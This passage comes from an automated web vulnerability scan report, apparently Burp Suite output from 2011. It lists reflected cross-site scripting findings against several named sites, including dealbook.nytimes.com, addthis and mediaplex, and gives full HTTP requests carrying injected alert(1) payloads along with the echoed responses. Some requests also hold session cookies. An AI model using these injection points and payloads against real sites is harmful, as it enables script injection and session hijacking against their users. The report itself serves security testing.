GET /cgix/AppLoader.cls/AENDU0IN29GG/7008380e8<img%20src%3da%20onerror%3dalert(1)>95c2f9acef8/16420/language%3Aen%3Bcountry%3AUS%3B?cc=0.6917730856221169 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/26401.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:08:24 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 58

// noop: 7008380e8<img src=a onerror=alert(1)>95c2f9acef8

4.95. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ceec1<img%20src%3da%20onerror%3dalert(1)>73991205269 was submitted in the REST URL parameter 3. This input was echoed as ceec1<img src=a onerror=alert(1)>73991205269 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GGceec1<img%20src%3da%20onerror%3dalert(1)>73991205269/7008/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:16 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 82

// noop: d: [AENDU0IN29GGceec1<img src=a onerror=alert(1)>73991205269,7008,25529]

4.96. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a202b<img%20src%3da%20onerror%3dalert(1)>38bb7ff743d was submitted in the REST URL parameter 4. This input was echoed as a202b<img src=a onerror=alert(1)>38bb7ff743d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008a202b<img%20src%3da%20onerror%3dalert(1)>38bb7ff743d/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:29 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 58

// noop: 7008a202b<img src=a onerror=alert(1)>38bb7ff743d

4.97. http://da.newstogram.com/hg.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 19af2<script>alert(1)</script>e16d4149e4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed19af2<script>alert(1)</script>e16d4149e4 HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:41 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:41 GMT; domain=.newstogram.com
Content-Length: 162

Newstogram.completed19af2<script>alert(1)</script>e16d4149e4({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

4.98. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7111<script>alert(1)</script>14f91b7e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.compl/d7111<script>alert(1)</script>14f91b7e83eted HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:47 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:47 GMT; domain=.newstogram.com
Content-Length: 163

Newstogram.compl/d7111<script>alert(1)</script>14f91b7e83eted({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

4.99. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/mergers-acquisitions/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f31"><script>alert(1)</script>d4e86dd7255 was submitted in the REST URL parameter 2. This input was echoed as e7f31\"><script>alert(1)</script>d4e86dd7255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topicse7f31"><script>alert(1)</script>d4e86dd7255/mergers-acquisitions/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:16:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topicse7f31\"><script>alert(1)</script>d4e86dd7255/mergers-acquisitions&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle
...[SNIP]...

4.100. http://dealbook.nytimes.com/category/main-topics/private-equity/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/private-equity/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f84c"><script>alert(1)</script>e1de8e2eba6 was submitted in the REST URL parameter 2. This input was echoed as 5f84c\"><script>alert(1)</script>e1de8e2eba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topics5f84c"><script>alert(1)</script>e1de8e2eba6/private-equity/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.6.10.1305198192; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200199902:ss=1305198204263

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topics5f84c\"><script>alert(1)</script>e1de8e2eba6/private-equity&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left
...[SNIP]...

4.101. http://dealbook.nytimes.com/category/main-topics/venture-capital/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/venture-capital/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe83"><script>alert(1)</script>aec22f4a558 was submitted in the REST URL parameter 2. This input was echoed as dbe83\"><script>alert(1)</script>aec22f4a558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topicsdbe83"><script>alert(1)</script>aec22f4a558/venture-capital/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=FADD01C96E4F27CAA76E2D598CDA52BE&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199637269:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.4.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f7=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topicsdbe83\"><script>alert(1)</script>aec22f4a558/venture-capital&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Lef
...[SNIP]...

4.102. http://ds.addthis.com/red/psi/sites/www.csscorp.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csscorp.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f3a5c<script>alert(1)</script>fa005dc8a42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.csscorp.com/p.json?callback=_ate.ad.hprf3a5c<script>alert(1)</script>fa005dc8a42&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.csscorp.com%2F&ffv352 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:10:14 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:10:14 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:10:14 GMT
Connection: close

_ate.ad.hprf3a5c<script>alert(1)</script>fa005dc8a42({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.103. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dd5d7<script>alert(1)</script>da1a969282b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hprdd5d7<script>alert(1)</script>da1a969282b&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&ref=http%3A%2F%2Fwww.elawmarketing.com%2F&149tj8h HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:00:58 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:00:58 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305201658.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:00:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:00:58 GMT
Connection: close

_ate.ad.hprdd5d7<script>alert(1)</script>da1a969282b({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.104. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7f299<script>alert(1)</script>34209919e93 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr7f299<script>alert(1)</script>34209919e93&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1mrdgam HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 457
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 11:49:37 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 11:49:37 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200977.1FE|1305200977.1OD|1305200977.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 11:49:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:37 GMT
Connection: close

_ate.ad.hpr7f299<script>alert(1)</script>34209919e93({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...

4.105. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3f80'%3balert(1)//cf614ca88fe was submitted in the mpck parameter. This input was echoed as f3f80';alert(1)//cf614ca88fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592f3f80'%3balert(1)//cf614ca88fe&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
